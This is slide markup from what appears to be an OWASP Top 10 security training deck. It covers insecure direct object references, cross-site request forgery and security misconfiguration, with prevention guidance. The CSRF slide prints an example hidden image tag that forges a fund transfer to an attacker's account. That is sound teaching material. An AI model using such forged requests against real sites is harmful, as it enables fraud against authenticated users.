              <a:rPr lang="en-US" sz="800" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>isAuthorizedForFunction</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>() )</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>For additional access control requirements, see the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>ASVS requirements area for Access Control (V4)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a: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9"/>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CWE Entry 639 on Insecure Direct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22 on Path Traversal</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(which is an example of a Direct Object Reference attack)</a:t>
            </a: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insecure direct object references requires selecting an approach for protecting each user accessible object (e.g., object number, filename):</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Use per user or session indirect object references</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. This prevents attackers from directly targeting unauthorized resources. For example, instead of using the resource’s database key, a drop down list of six resources authorized for the current user could use the numbers 1 to 6 to indicate which value the user selected. The application has to map the per-user indirect reference back to the actual database key on the server. OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> includes both sequential and random access reference maps that developers can use to eliminate direct object references. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Check access</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Each use of a direct object reference from an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>untrusted</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> source must include an access control check to ensure the user is authorized for the requested object.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Insecure Direct Object References</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A4</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51722"/>
          <a:ext cx="6858000" cy="2563003"/>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6931">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WIDESPREAD</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err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx1"/>
                          </a:solidFill>
                          <a:latin typeface="+mn-lt"/>
                          <a:ea typeface="+mn-ea"/>
                          <a:cs typeface="+mn-cs"/>
                        </a:rPr>
                        <a:t>Detectability</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" b="1" kern="1200" dirty="0" smtClean="0">
                        <a:solidFill>
                          <a:schemeClr val="tx1"/>
                        </a:solidFill>
                        <a:latin typeface="+mn-lt"/>
                        <a:ea typeface="+mn-ea"/>
                        <a:cs typeface="+mn-cs"/>
                      </a:endParaRP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16481">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trick your users into submitting a request to your website. Any website or other HTML feed that your users access could do this.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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Attacker creates forged HTTP requests and tricks a victim into submitting them via image tags, XSS, or numerous other techniques. </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" u="sng" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>If the user is authenticated</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, the attack succeeds.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hlinkClick r:id="rId4"/>
                        </a:rPr>
                        <a:t>CSRF</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> takes</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> advantage of web applications that allow attackers to predict all the details of a particular action.</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Since browsers send credentials like session cookies automatically, attackers can create malicious web pages which generate forged requests that are indistinguishable from legitimate ones.</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Detection of CSRF flaws is fairly easy via penetration testing or code analysis.</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cause victims to change any data </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>the victim is allowed to change </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>or perform</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> any function the victim is authorized to use.</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or application functions</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Imagine not being sure if users intended to take these actions.</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the impact to your reputation.</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allows a user to submit a state changing request that does not include anything secret. Like so:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  http://example.com/app/transferFunds?amount=1500</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  &amp;destinationAccount=4673243243</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
              <a:solidFill>
                <a:srgbClr val="C00000"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>So, the attacker constructs a request that will transfer money from the victim’s account to their account, and then embeds this attack in an image request or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> stored on various sites under the attacker’s control.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>img</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>="</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>http://example.com/app/transferFunds?</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  amount=1500&amp;destinationAccount=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>attackersAcct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>#</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>“</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1000" b="1" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:srgbClr val="002060"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  width="0" height="0" /&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>If the victim visits any of these sites while already authenticated to example.com, any forged requests will include the user’s session info, inadvertently authorizing the request.</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CSRF?</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easiest way to check whether an application is vulnerable is to see if each link and form contains an unpredictable token for each user. Without such an unpredictable token, attackers can forge malicious requests. Focus on the links and forms that invoke state-changing functions, since those are the most important CSRF targets.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>You should check multistep transactions, as they are not inherently immune. Attackers can easily forge a series of requests by using multiple tags or possibly JavaScript.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Note that session cookies, source IP addresses, and other information that is automatically sent by the browser doesn’t count since this information is also included in forged requests.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CSRF Tester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> tool can help generate test cases to demonstrate the dangers of CSRF flaws.</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CSRF Article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CSRF Prevention Cheat Sheet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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>CSRFGuard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t> - CSRF Defense Tool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ESAPI Project Home Page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ESAPI </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>HTTPUtilities</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> Class with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>AntiCSRF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t> Tokens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OWASP Testing Guide: Chapter on CSRF Testing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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>CSRFTester</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t> - CSRF Testing Tool </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t/>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
            </a:b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352 on CSRF </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1000" u="sng" dirty="0" smtClean="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CSRF?</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CSRF requires the inclusion of a unpredictable token in the body or URL of each HTTP request. Such tokens should at a minimum be unique per user session, but can also be unique per request.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The preferred option is to include the unique token in a hidden field. This causes the value to be sent in the body of the HTTP request, avoiding its inclusion in the URL, which is subject to exposure.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>The unique token can also be included in the URL itself, or a URL parameter. However, such placement runs the risk that the URL will be exposed to an attacker, thus compromising the secret token.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr indent="-228600">
              <a:lnSpc>
                <a:spcPts val="1000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="300"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>CSRF Guard</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> can be used to automatically include such tokens in your Java EE, .NET, or PHP application. OWASP’s </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>ESAPI</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> includes token generators and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" err="1" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>validators</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1000" dirty="0" smtClean="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> that developers can use to protect their transactions.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Title 25"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cross-Site Request Forgery</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>(CSRF)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text Placeholder 26"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="10"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A5</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48521"/>
          <a:ext cx="6858000" cy="2536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2446">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51035">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a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> anonymous external attackers as well as users with their own accounts that may attempt to compromise the system. Also consider insiders wanting to disguise their actions.</a:t>
                      </a:r>
                      <a:endParaRPr lang="en-US" sz="1000" dirty="0" smtClean="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accesses default accounts, unused pages, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>unpatched</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> flaws, unprotected files and directories, etc. to gain unauthorized access to or knowledge of the system.</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baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>Security </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>misconfiguration</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t> can happen at any level of an application stack, including the platform, web server, application server, framework, and custom code. Developers and network administrators need to work together to ensure that the entire stack is configured properly. Automated scanners are useful for detecting missing patches, </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" err="1" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>misconfigurations</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" b="0" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>, use of default accounts, unnecessary services, etc.</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frequently give attackers unauthorized access to some system data or functionality</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. Occasionally, such flaws result in a complete system compromise.</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The system could be completely compromised without you knowing it</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr lang="en-US" sz="1000" baseline="0" dirty="0" smtClean="0">
                          <a:solidFill>
                            <a:schemeClr val="tx2"/>
                          </a:solidFill>
                        </a:rPr>
                        <a:t>. All your data could be stolen or modified slowly over time. </a:t>
                      </a:r>
                    </a:p>
                    <a:p>
                      <a:pPr>
                        <a:lnSpc>
                          <a:spcPts val="1000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="300"/>
                        </a:spcBef>
                        <a:spcAft>
                          <a:spcPts val="300"/>
                        </a:spcAft>
                      </a:pPr>
                      <a:r>
